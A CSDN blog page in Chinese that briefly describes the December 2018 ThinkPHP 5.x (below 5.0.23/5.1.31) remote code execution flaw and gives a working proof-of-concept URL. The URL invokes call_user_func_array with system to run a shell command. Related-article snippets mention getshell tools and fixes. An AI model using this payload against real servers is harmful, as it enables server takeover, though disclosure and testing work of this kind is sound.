ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞

最新推荐文章于 2024-08-11 19:27:09 发布

Ambulong

最新推荐文章于 2024-08-11 19:27:09 发布

阅读量5.5k

点赞数

文章标签： thinkphp rce 漏洞代码执行

本文链接：https://blog.csdn.net/Ambulong/article/details/84949210

版权

ThinkPHP官方2018年12月9日发布重要的安全更新，修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新，由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞，受影响的版本包括5.0和5.1版本，推荐尽快更新到最新版本。

在线环境地址：https://www.vulnspy.com/cn-thinkphp-5.x-rce/

执行phpinfo POC：

http://tp.vsplate.me/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Ambulong

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

ThinkPHP 5.0.23/5.1.31 远程代码执行（含批量验证poc）

weixin_43567873的博客

04-03

233

ThinkPHP 5.0.23/5.1.31 远程代码执行（含批量验证poc）

Thinkphp V5.X 远程代码执行漏洞 - POC（精：集群5.0*、5.1*、5.2*）

墨痕诉清风的博客

11-07

4492

官方公告:1、2、POC：批量检测单个检测。

参与评论您还未登录，请先登录后发表或查看评论

thinkphp5调用shell脚本_【ThinkPHP5】远程代码执行

weixin_39607710的博客

01-03

509

跟着小编一起动手操作吧！ThinkPHP5远程代码执行漏洞实验内容ThinkPHP是一个免费开源的快速、简单、面向对象的轻量级PHP开发框架，是为了敏捷Web应用开发和简化企业应用开发而诞生。ThinkPHP 5.0版本是一个颠覆和重构版本，采用全新的架构思想，引入了更多的PHP新特性，优化了核心，减少了依赖，实现了真正的惰性加载，支持composer，并针对API开发做了大量的优化。ThinkP...

ThinkPHP5.0.15漏洞解析及SQL注入

最新发布

m0_70638961的博客

08-11

350

通过查看5.0.15和5.0.16版本的对比，可以看到16版本对在Builder.php里面对数据库的增减做了修正，所以可以15版本的漏洞就存在在这里。这里的代码用的拼接的方式，就可以尝试使用报错注入来实现。到了这里就发现，我们注入的三个值在这里派上了用场，val[1]就是注入的报错语句，这里走完，返回的就是报错注入语句+1，接下来我们继续走，一直走到这里。为了清楚代码是怎么走的，我们可以在insert()打一个断点，重新提交后就可以进入断点了，这里我们可以看到username有三个值。

thinkphp5调用shell脚本_tp5或thinkphp5执行shell命令定时执行命令行运行php脚本

weixin_39731916的博客

12-23

1618

application\common.php文件内容如下：return ['app\shell\command\Test',];application\shell\command\Test.php内容如下：namespace app\shell\command;use think\console\Command;use think\console\Input;use think\console\O...

THINKPHP5 getshell

公众号shadow sock7

12-11

7911

参考： https://mp.weixin.qq.com/s/oWzDIIjJS2cwjb4rzOM4DQ https://www.anquanke.com/post/id/167653 http://www.vulnspy.com/cn-thinkphp-5.x-rce/thinkphp_5.x_(v5.0.23及v5.1.31以下版本)_远程命令执行漏洞利用（getshell）/ ...

thinkphp v5.0.11漏洞_ThinkPHP 5.x 远程代码getshell漏洞实战分析

weixin_39700394的博客

12-21

266

ThinkPHP 简介ThinkPHP 是一个免费开源的，快速、简单的面向对象的轻量级PHP开发框架，因为其易用性、扩展性，已经成长为国内颇具影响力的WEB应用开发框架漏洞解析漏洞引发的原因是框架对控制器名没有进行足够的检测，现拉取ThinkPHP v5.0.22 来进行测试请求路由=>http://127.0.0.1/public/index.php?s=/index/\think\ap...

thinkphp5调用shell脚本_ThinkPHP 5.x远程命令执行测试工具（可getshell）

weixin_39841825的博客

12-23

1325

该工具只能授权验证网站漏洞和站长验证漏洞使用。禁止用于未授权测试，非法入侵，否则一切后果自负，和作者无关。影响范围5.x < 5.1.315.x <= 5.0.23以下基于ThinkPHP5 二次开发的内容管理系统，很可能受到该漏洞影响，建议厂商及时更新。AdminLTE后台管理系统layui后台管理系统thinkcmfH-ui.admin后台管理系统tpshopFsatAdminey...

php5漏洞汇总,ThinkPHP 5.x RCE 漏洞分析与利用总结

weixin_34931142的博客

03-19

1266

一、ThinkPHP 5.0.23 rce漏洞复现与总结漏洞复现thinkphp 5.0.23 rcethinkphp 5.0.23 rce源码下载：github：https://github.com/top-think/framework/tree/v5.0.23影响版本ThinkPHP 5.0系列 < 5.0.23ThinkPHP 5.1系列 < 5.1.31安全版本ThinkPH...

python3编写ThinkPHP命令执行Getshell的方法

09-19

主要介绍了python3编写ThinkPHP命令执行Getshell的方法，小编觉得挺不错的，现在分享给大家，也给大家做个参考。一起跟随小编过来看看吧

ThinkPHP 5.0 远程代码执行漏洞分析

02-21

ThinkPHP 5.0 远程代码执行漏洞分析

ThinkPHP v5.x命令执行利用工具（可getshell）

11-19

ThinkPHP v5.x命令执行利用工具（可getshell）

tp5或thinkphp5执行shell命令定时执行命令行运行php脚本

webnoties的专栏

07-25

8182

application\common.php文件内容如下： return [ 'app\shell\command\Test', ]; application\shell\command\Test.php内容如下： namespace app\shell\command; use think\console\Command; use think\console\Input...

ThinkPHP 小于5.0.24 远程代码执行高危漏洞修复方案

热门推荐

无限星辰的博客

01-12

1万+

漏洞描述由于ThinkPHP5.0框架对Request类的method处理存在缺陷，导致黑客构造特定的请求，可直接GetWebShell。漏洞评级严重影响版本 ThinkPHP 5.0系列 &lt; 5.0.24 安全版本 ThinkPHP 5.0系列 5.0.24 ThinkPHP 5.1系列 5.1.31 安全建议升级ThinkPHP至安全版本修复方法1.打开 \thinkphp\...

thinkphp5调用shell脚本_thinkphp5.x命令执行漏洞复现及环境搭建

weixin_42114046的博客

02-11

516

楼主Linux环境是Centos7,LAMP怎么搭不用我废话吧，别看错了1.安装composeryum -y install composer安装php拓展yum -y install php-mysql php-gd libjpeg* php-ldap php-odbc php-pear php-xml php-xmlrpc php-mbstring php-bcmath php-mhash -...

thinkphp6.0 配合shell 脚本定时任务

xxpxxpoo8的专栏

08-22

946

【代码】thinkphp6.0 配合shell 脚本定时任务。

thinkphp5调用shell脚本_ThinkPHP 5.x远程命令执行漏洞复现

weixin_34566429的博客

12-23

552

一、漏洞描述2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞:漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。二、漏洞影响版本Thinkphp 5.x-Thinkphp 5.1.31Thinkphp 5.0.x<=5.0.23三、漏洞复...

thinkphp5.x 漏洞修复

10-30

修复ThinkPHP 5.x漏洞可以从以下几个方面入手： 1. 更新最新版本：保持框架的版本更新是修复漏洞的首要措施。ThinkPHP团队会不断发布更新版本来修复漏洞和增加新功能，因此及时更新到最新版本是必要的。可以在官方...